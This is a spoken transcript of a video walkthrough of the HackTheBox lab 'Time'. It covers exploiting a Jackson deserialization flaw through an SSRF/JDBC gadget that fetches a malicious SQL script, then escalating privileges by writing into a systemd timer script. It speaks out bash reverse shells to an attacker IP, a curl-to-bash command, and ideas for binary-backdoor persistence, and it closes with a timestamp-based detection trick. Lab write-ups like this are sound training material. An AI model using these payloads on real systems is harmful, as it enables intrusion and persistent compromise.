What's going on YouTube? This is Ipsec, and we're doing Time from HackTheBox. And this box is all about being able to take an error message, finding out what application and library that web app uses, and then looking for exploits in the actual library. By putting non-JSON data into the website, you get an error message about Jackson, which is I think, Java library for serializing things. And there's a vulnerability which can lead to code execution. It's pretty hard to understand the gadget chain of deserialization, so we just look over a blog post, find some ways to identify it, and test out basic proofs of concepts, and then get a shell. Once on the box, the privesc is related to a systemd timer, and LinPEAS does show this. It doesn't highlight it in that red and yellow thing, but if you just read the LinPEAS output, this becomes super familiar. Additionally, if you look at the forensics around where that file exists, you'll see that the actual timestamp of the file sticks out like a sore thumb, so we go into that at the end of the video. With all that being said, let's jump in. As always, we're going to start with the nmap, so -sc for default scripts, SV enumerate versions, OA output all formats, put in the nmap directory and call it time, and then the IP address of 10.10.10.214. This can take some time to run, so I've already ran it. Looking at the results, we see just two ports open, SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80, and its banner tells us it's Apache HTTPD and also Ubuntu. There's not too much information here. I guess we got this title of the HTTP page saying it's an online JSON parser. And then if we wanted to, we could search these versions like this for Ubuntu. We just put that into Google and go to Launchpad. It'll tell us what distro it is. I think Bionic Beaver. And we can see uploaded to Bionic. So we know this is Ubuntu 18. If it was Ubuntu 20, it would say like Focal, I think, for Focal Fossil. I think that's what Ubuntu 20 is. But yeah, not too much information. But let's put this in Obsidian so we can have some notes that are easily accessible. So I'm going to do new note 05, and we'll call it nmap. And put the results here, and we can say use the SQL parser, so we have syntax highlighting. You can say any language you want. There's even an nmap one if you custom install it. I don't know how to do that off the top of my head yet, so I have not included that. But in the future videos, we'll have a custom nmap parser probably for this. And then we want to take notes. We can say this is Bionic Beaver based upon this. So I'm going to put a dash, and then we will go to Launchpad and grab this. So whenever you want to put a finding, this is a finding, like you can guess, enumerate what exact version of Linux it is based upon the banner. It's always good to have like the link in your back pocket of the guess. How do you know that's Bionic Beaver from this? Well, you go here and you see the only package this is deployed to is Bionic. And the reason why this is kind of a security vulnerability is because if it was like Ubuntu 14 and they forgot to patch, it makes it just more apparent because it's just screaming it's an out-of-date server. And if it was Ubuntu 14, I know, okay, well, once I get on this box, I probably should just throw Dirty Cow or some other CVE against it. So yeah. Let's just move on to take a look at the web server. So we go 10.10.10. Is it 2.14 or 2.15? Looks like 2.14 is good. And we get this online JSON beautifier and validator. So if we just put in some text, we can see what happens. It just says null. We can put in JSON. So like, what should you do? And we'll say subscribe. Out of habit, I almost type please subscribe. So we click process and it just purifies that JSON. There is a drop down here. So we got this validate, and I'm going to copy this JSON and we'll try putting it under this validator. We click process and it takes a bit longer and we get validation failed. What should you do? Subscribe. So we didn't get anything. I'm just going to put random text here that's not JSON to see what happens. And we have to make sure we're on validate. And see what happens if we give this field not JSON input. We get a unhandled Java exception. So this is definitely interesting. So we'll create a new note, 10 web, I guess. And we'll say validator. And we can say input, please subscribe, output, like that. Okay, so we have something here. And the key thing is it's telling us it's Jackson core JSON parser. We get unrecognized token, please subscribe, was expecting true, false, or null. So if I just type true here on this validate and see what happens here. We get processing, validation successful. If I give it JSON and do true, what happens? And this is just exploring the application. We have to copy, paste, and see what happens. We get validation failed. I started with a line break, so let's just get rid of that. And click process. And after it takes some time, we just get validation failed still. So when we don't give it JSON, that is the most interesting piece. So we look at this, and right now I want to put emphasis around this, because it's telling us what library is underneath. It's also telling us it is Java, so we can put emphasis around Java. And again, a finding would be you don't display your error messages to standard out, because it does indicate like good enumeration. So one of the findings here would just be unhandled errors get displayed. And generally, if you're in like production mode and not debug, that's not a thing. But yeah, stack traces out to people when they cause errors is very bad, because we can just Google this and type exploit and see if anything on this exploit occurs. We have something from 2019, this SRC thing. It looks like a write-up. Let's see, Jackson. I'm also going to say like Jackson, since that was 2019 thing, I'll just say Jackson 2019 CVE, and we can get a few more. And then we can also go over here and do search exploit Jackson to see if we have anything, and we don't. Going back over to our articles, let's take a look at this very first one. This is attacking on Marshall's JD and I injection based upon deserialization. So this looks like it's telling us quite a bit. We have Jackson Core 299, and there was no way I can verify like what Jackson version this is so far. If I do a Control U to view the source, if I look around here, I don't really see anything. We could go in JavaScript, but I'm not sure how to validate what version this application is. So we're kind of just looking for some type of payloads where we can throw and see if we get anything. I don't really see exploits here. I don't want to go and like copy this and run it in a Java application. It looks like it's giving me a string. So I think if I sent this payload, we may be able to do something. But again, I'm going to see if I can find a better one, because I just hate building Java projects. If I find like Python exploits, that's where like I like playing with a lot more, because you don't have to compile something and then execute it. And I'm just more familiar with Python. So looking through this, it's explaining the exploit, but I just want to find out if it's vulnerable or not. So we have this string here. So it looks like it is escaped, meaning if I paste this, we have these escapes around these quotes, and I don't really want those. So I'm just going to echo this, and the echo just magically processes those escapes, and we have this payload. And we don't really have too much here, but let's see if this throws a unique error. So if I go back to this online JSON parser and put this, what does it say? Do we get like some error about this driver? Unhandled Java exception. Let's just copy it here. Go over, input. Oh God, that is a big error. This is the output, but oh God, a stack overflow happened. So that did not go what I thought, but I'm just going to say ... snip ... And this is output. So I think we have some type of exploit here just based upon that. And the thing I gotta get better with is copy and pasting, because the input keeps going away. So I copied it from here. So this is the input. And then one thing I want to do is just screenshot this page. So if we go here, print screen, and this is flame shot, and I can just copy, screenshot, Control C, and we paste. There we go. So this way, the title does show this page. Okay, so that input is good. We probably need to escape these like that, because it is marked down and those brackets actually do something. So this looks better. So we can say input, that, output, that. Okay, the next thing. Let's go and keep going down to see if they give anything. They have server-side request forgery to RCE. And this is something we're going to be seeing a lot more because people have started learning how to weaponize SSRFs, mainly thanks to like Orange Sai. If we Google Orange TSAI, I think it'll be his Twitter. This guy does SSRF like he's amazing at them. So he's exploited a bunch of firewall products like every year at Black Hat. He does one-ups himself. Like he's found Palo Alto exploits, I believe, Pulse VPN. Even the latest Exchange exploit was found by Orange Sai, and it was an SSRF. So there's a lot of cool things you can do with SSRFs that people are finding out. And it looks like we have this deserialization gadget, and it's just like the last one. We're still doing this driver managed connection, but we're giving it JBDC or JDBC, which is Java database something connectivity. Yeah, the DB is database. So Java database connectivity. So we're giving it a URL that says, hey, I'm a Java database. And we're saying run script and saying go to this URL, inject.sql. And this injection script is just going to create a function called shell exec. And then it's going to attempt to run bash-c. So it's like an XP, CMD, and MySQL or MS SQL, but for these JDBCs. So we create a function in this to run a code. So let's just do what we did before. So we can copy this, echo, paste, and then we'll probably want to change localhost 8000 to be 10.10.14.2, which is my IP address. And I'm also going to listen on port 8000. So we'll see if this connects back to us. So I can just copy this. Then we go back over to our page, make sure we're on validate, paste. And if it connects, we get something good. So this is great. So we can go back here to our notes, input this, output HTTP connection. Okay, so let's make dir www, and we're going to put his shell in. So let's go and back to our browser. And where is the SQL? Here we go. So v inject.sql, paste. And instead of this ID to exploited, I just want to do a ping. So we can say ping-c1 10.10.14.2. That is good. Save it. And then Python 3-m HTTP server. TCP dump -i ton 0 ICMP. Probably run that with sudo. And we can run this command again. So if I probably want to copy it from terminal because I escaped it from my markdown notes. So we can copy this, go back here, paste to validate, and verification failed. Something weird happened because it didn't even get our server. Copy. Let's try this again. Process. I probably had like I do have something. There's a line break there. So sometimes I don't know exactly what it is, but when I copy it, it copies the line break with it. And I just paste that to beautify. Okay, this doesn't have a line break. Let's validate. It's taking longer. We got it, and we get one single ping. So we know this works. So let's try upgrading from a ping to be a reverse shell. So let's go to inject.sql, and it's already calling bash-c, so I don't have to do that. I know I'm executing this command in bash. So what I'm going to do is bash-i. Is it like that? I think so. 10, 10, 14, 2, 0 at and 1. Dev TCP 10, 10, 14, 2, 9001. There we go. That looks like a reverse shell. So let's nc lvmp 9001, and we will execute this yet again. So execute. We got it. And now we have a reverse shell. So let's upgrade this TTY. So python-c import pty, pty.spawn, bin bash, and then stty raw -echo fg, enter, enter. So now I have tab autocomplete and things like that in my shell. But before I can go on, I do want to grab inject.sql. So I'm going to cat inject.sql, and we will paste this here for our notes. So going back to this, paste, and this can be SQL. Let's see what that looks like. Looks great. So we'll clean up these notes once we finish with the box. So now that we have a shell on this box, we can probably run LinPEAS. So let's go to a new tab or a new window, and we're going to cp opt. Is it privilege escalation? Is it P? There we go. And then LinPEAS, linpeas.sh. Run a web server again. I don't know why I just killed it like a second ago. But now we have that. We can curl 10, 10, 14, 2, port 8000, linpeas.sh, pipe it over to bash. And we'll see what this ends up showing us. I'm going to pause the video and we'll resume once this command has finished. LinPEAS is now finished running, so let's go take a look at what it says. And the very first thing we have is, wait, this is actually Ubuntu Focal. So I guess I was wrong at the very beginning of the video, thinking this was Bionic. It's telling us it's Focal. So latest version of Ubuntu. Sudo version 1831. Maybe this hasn't been patched yet. Let's see if we go here and see what this says. Search exploit sudo. I thought it would give us like a test if sudo is vulnerable. I want to say we can edit test it with like sudo edit. So we should take a look at that. I think there was like a 1831 p2 or something. So we should take a look at sudo, saying it's a virtual machine. These are processes. So we can just take a quick look at all the root processes. Apache is normally starting as root because you have to listen, or you have to be root to listen or a socket below 1024, I think. It's like privileged sockets. So Apache starts as root and then it downgrades itself to a different user. So nothing too interesting here in these processes. You can look at other things, credentials and memory. This is looking at cron tab. Everything looks standard so far. System dpath, .service files. There's a lot of service files. Can't write to system dpath. We do have something unique here. Under the system timers, we have this timer backup timer. So this is definitely interesting. I'm going to just make notes in LinPEAS. So provask maybe, and I'm just going to put system D timer, something like that. Just to take a look at it, and we should have merked sudo version. I think it was 1831. Memory serves correctly. Keep going down, HTTP sockets, config files, interfaces, IP tables, login now, password policy. Nothing too interesting so far. Tons and tons of searches. Now it's looking at interesting files. So these are going to be setuid files. I'm just quickly glancing over these to see if there's any I don't recognize. And I don't see any. Oddly enough, that user bin sudo, is that symlinked over to /sudo? I don't know. Looking at it, nothing in ld.so preloads. Capabilities. You own the script this, which is a timer backup script, so that is interesting. So that was looking at files I own within the path environment, so user bin. We have potentially a bash history. And we're about out of the interesting things. Okay, we're out. So I want to try sudo edit / was it? I think that was supposed maybe -S. Let's see. Test for sudo exploit. I know it was with sudo edit. And maybe it was giving it a long path. There we go. So let's see. While running this, backtick. Sudo has a built-in. How to check if you're infected. Run this. If you receive a usage or error message, sudo is not vulnerable, or a seg fault, it is. So probably not vulnerable because we did not seg fault. Okay, so we can say not vuln ran this. Okay, the system D timer. This is interesting. So let's go and go into Etsy, find.grep timer, and see what we have. We got this timer backup. So we can cat this file. And we see, let's see, on inactive, so every 10 seconds, it runs this timer backup service. If we cat this, let's see what this does. Backup service, unit, restart, web backup.service. Let's see. Exec. We probably should have done to dev null to hide error messages. I wonder what this web backup service is. Let's see. I'm just going to grep for this timer backup.sh. So grep-r to go into all these directories, and to dev null. So this systemd web backup service is going to run this timer backup. So it looks like it was just like hid between service of service of service. Maybe. If we cat this file, yeah, creates a backup of the website and executes this script. So if we go user bin, cd user bin, lsla, we can see we own this file, so we can just write to it. So we could just put a reverse shell here. If we do nc lvnp 9001 v this file, let's do bash-c, bash, we'll put this in quotes, bash-I think it's a single quote. Probably doesn't matter. dev TCP 10.10.14.2 9001 0 at and 1, like that. So we wrote to this file. Oh shoot. I just killed that shell. Hopefully I did not typo this. Oh, there we go. ls-grat ti. What file did I just cat? Where's cat? Come on. I can just cat this file. Cat. So it doesn't look like it did anything. Let's vi this. Maybe I typoed or something happened. --c --i dev TCP 10.10.14.2 9001 0 and 1. So we need to write it with an exclamation point, and it is here. And we get a shell. There we go. I'm not sure what happened that first time, but we have rooted this box. Now, there is some interesting things we can talk about in this box. For instance, the user placed something in user bin. And while this may not be a super common thing to do, it's common in malware. I'm going to export term is equal to xterm. So now I can clear the screen. So one of the common things is if we echo path, and let's say where's ping? So ping is in user bin. So it's here. So if I want to persist on this box, here, I may put a ping binary in user local sbin. So user local sbin, and we can say v ping, say it's a bash script, bin bash, we can say echo hello ping. I think that may be the first argument. There's a better way to do this. There's a way to like put all arguments into the binary, but oh, I'm not root, so it's not going to work. But you could do something like that, and now when they run ping, it's going to run your command and then go back to the regular ping binary. But there's an easy way to check for things like this that doesn't get a lot of publicity. And that is something I've talked about in 2 previous videos, which is just the timestamp on things. So this user local directory, this is where users are supposed to put bins. When it says local, that means like user. When it doesn't say local, that means it's supposed to be managed by the package manager. So if we go to user bin and we do a lsla, we just see these dates. If we do lsla --time style equals full, we see full timestamps. And a lot of like packages like tar, zip, dpackage, everything doesn't record like the microseconds or whatever argument or time measurement this is. So that's why you see all those. But if you interact with a file, it does record that. So if you do lsla on this time, we can see this time backup has stuff. So this means it was probably placed here by the user because it didn't come out of dpackage, which anything in user bin should come out of dpackage. So if I wanted to backdoor a binary and take it even one step further than just creating ping in user sbin, what I would do is I'd put some shellcode into this ping binary, or because Linux is open source, grab the source code to the ping binary, recompile it with my backdoor in, and place it on the box. But because I put it on the box and didn't just clean up my timestamp manually, it will have this 476 or whatever the time increment is. It's not going to go all zeros. Like if you've ever like gotten gas and tried to stop it evenly on $1, it's just not going to happen. So you just won't really see these timestamps occur naturally by people. So what you could do is echo path, and we can say echo path. Let's get rid of anything with, we'll replace these colons with something. So s:/g like that. So now we have a bunch of things. And let's get rid of these user locals. We don't care about those. We just want to look at these paths. So if I do a quick script, so for I in this, do echo I, done. And I'm going to have to fix up my TTY real quick. So stty-a, stty rows 32. I'm doubling the rows because I want to go the full window. Calls 136, I think. There we go. So now if I run that command, I don't go off screen. But we can see I can loop amongst all these directories. So what I can now do is we can do this ls-la-time style equals full. Let's see, time dash style. So now we ran that command across our whole path. And then we can say grep-v and put 5 zeros in. So we're saying hide everything with 5 zeros. So now we get a bunch of weird things. We get the symlinks do have these exact paths. So let's hide anything with a symlink by just excluding that arrow. There's probably a ls argument to do it, but I'm in grep. It's easy enough to do it this way. So all I do is grep-v on those 5 zeros, then \pipe, which is an or, and or the arrow. And I'm going to run this command. And the only file that comes back is timer backup, because that's the only file that's manually been edited into the path. So this would be a super easy way to find people that are backdooring your binaries without fixing the timestamp afterwards. So hope you guys like this demo. Take care, and I will see you all next. Oh, no, I forgot. We should go over our notes. One day I'll get better at this. So we got to do nmap, and we got this bionic beaver. This looks good. There's really nothing else we can highlight about this nmap. So good. Next thing, web. We look at this. This is messy. This doesn't look good to us. But we have everything we need. So we can just put what the page looks like. So this is home page. And then we can say validator. And we can go even further and say this is, let's see, display error. Then this one will be Stack Overflow, confirm exploit. And then this is confirm or make SSRF or make HTTP connection plus shell. And 1, 2, 3, 4. This will be inject.sql. We can say run a web server, host inject.sql, and make the below command. So it's not a perfect format, but we got the home page, we got validator, and when we go back to the notes, it does make some sense. So that's good. So now the privesc. We can say LinPEAS, highlighted that pseudo thing. We confirmed it wasn't vulnerable. The system D timer. This was the like jumping around things. So let's see exactly what this does. So we go cd etc find.grep timer. We'll probably just want to copy a few files. So let's cat this file. So we can copy bash. Then that goes to the timer backup. No, this goes to timer backup service. So that's what we want. So let's cat this one. Grab this. Where's my cat? I think this. No, that's the same thing, isn't it? Let's go back to this find. I want this file. Okay, that's what I was expecting. Maybe I didn't copy it. That's possible. So we go to this. And then the next thing we had was this web backup service. So find.grep cat paste. And then it executes this script, which LinPEAS told us was owned by us. So we can lsla on this. I'm also going to do stat. And stat's just going to show me that timestamp. So there we go. And we should say bash. Okay. So priv-esc chain. So this is going to be timer backup runs 10 seconds. Then the next thing we have is the timer backup service. So it calls web backup. And then web backup executes timer backup. And owned by Pericles and world writable. And then if we really want to, I guess I'll go like this. Additionally, in user bin, not placed by apt. Okay, so there we go. That would be kind of what my notes look like for this box. So now when I go back, I can clearly see the whole, like I can see what I found interesting from LinPEAS, and then like the priv-esc, like every step. I was like, oh, okay, LinPEAS pointed us to this timer backup service. The timer backup service pointed us here to this web backup. The web backup pointed us to this file. But yeah, we forgot one. Wait, what? 333. That just looks like bigger font than this to me, but I guess it's not. So that'll be the box. Hope you guys enjoyed it. Take care, and we'll see you all next week.